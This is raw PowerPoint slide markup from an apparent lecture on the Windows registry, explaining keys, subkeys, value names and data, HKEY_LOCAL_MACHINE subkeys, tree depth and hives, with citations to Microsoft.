              <a:t>Key Value Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SyeedHasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-6882158" y="43934"/>
            <a:ext cx="22887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tion of the values:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1964450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11</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW"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04" y="2020123"/>
            <a:ext cx="8379668" cy="428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2411760" y="4437112"/>
            <a:ext cx="1296144" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>value name</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="直線單箭頭接點 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2699792" y="3717032"/>
            <a:ext cx="0" cy="576064"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF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4355976" y="4437112"/>
            <a:ext cx="1296144" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>value data</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="直線單箭頭接點 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4644008" y="3717032"/>
            <a:ext cx="0" cy="576064"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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884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12</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 4" descr="registry editor wind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64904"/>
            <a:ext cx="54578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494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en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Each of the trees under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>My </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is a key. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKEY_LOCAL_MACHINE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>key has the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>subkeys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HARDWARE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SAM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SECURITY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SOFTWARE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SYSTEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>of these keys in turn has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>subkeys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>example, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HARDWARE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> key has the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>subkeys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DESCRIPTION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DEVICEMAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RESOURCEMAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DEVICEMAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> key has several </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>subkeys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VIDEO</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13</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Explanation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>of Previous Slide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4217142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Each value consists of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>and its associated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, if any. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MaxObjectNumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>VgaCompatible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> are values that contain data under the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>VIDEO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>subkey</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14</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Explanation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>of Previous Slide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3459305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A registry tree can be 512 levels deep. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>can create up to 32 levels at a time through a single </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>registry API call</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15</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Level of a Registry Tree </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3778390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7948405" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>hive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t> is a logical group of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sub-keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>, and their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>values</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>These </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>values are loaded into the memory and utilized by the operating system</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16</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>What is a hive? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SyeedHasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216976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2531451"/>
            <a:ext cx="8640959" cy="1401605"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Open up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
              </a:rPr>
              <a:t>regedit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and give it a look. </a:t>
            </a:r>
